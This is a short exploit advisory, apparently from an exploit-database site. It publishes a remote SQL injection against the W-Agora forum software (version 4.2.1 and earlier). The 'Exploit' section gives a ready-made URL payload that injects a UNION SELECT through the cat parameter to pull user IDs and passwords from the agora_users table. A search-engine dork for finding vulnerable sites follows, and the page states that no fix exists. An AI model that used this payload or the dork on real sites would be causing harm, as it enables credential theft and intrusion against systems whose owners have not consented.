w-Agora <= 4.2.1 (cat) Remote SQL Injection Vulnerability

2007-12-30 00:00:00

#########################################################################################
#
# [W-Agora <= 4.2.1]
#
# Class: SQL Injection # Found: 30/12/2007 # Remote: Yes # Site: http://w-agora.net
# Download: http://sourceforge.net/project/showfiles.php?group_id=3413
# Author: R00T[ATI]
# Contact: [email protected] - http://www.ihteam.net
# #########################################################################################

Exploit :
===================================================================================================================================================================================================================
http://site.com/[w-agora_path]/index.php?site=[site_name]&cat=-1/**/UNION/**/ALL/**/SELECT/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,concat(userid,0x3a,password),24/**/FROM/**/agora_users/*
===================================================================================================================================================================================================================


Thanks To:
=========================
All ihteam.net members;
=========================

DORK: allinurl:"index.php?site=" "W-Agora"

#ihteam.net - Inclusion Hunter Team

#

Fixes

No fixes

In order to submit a new fix you need to be registered.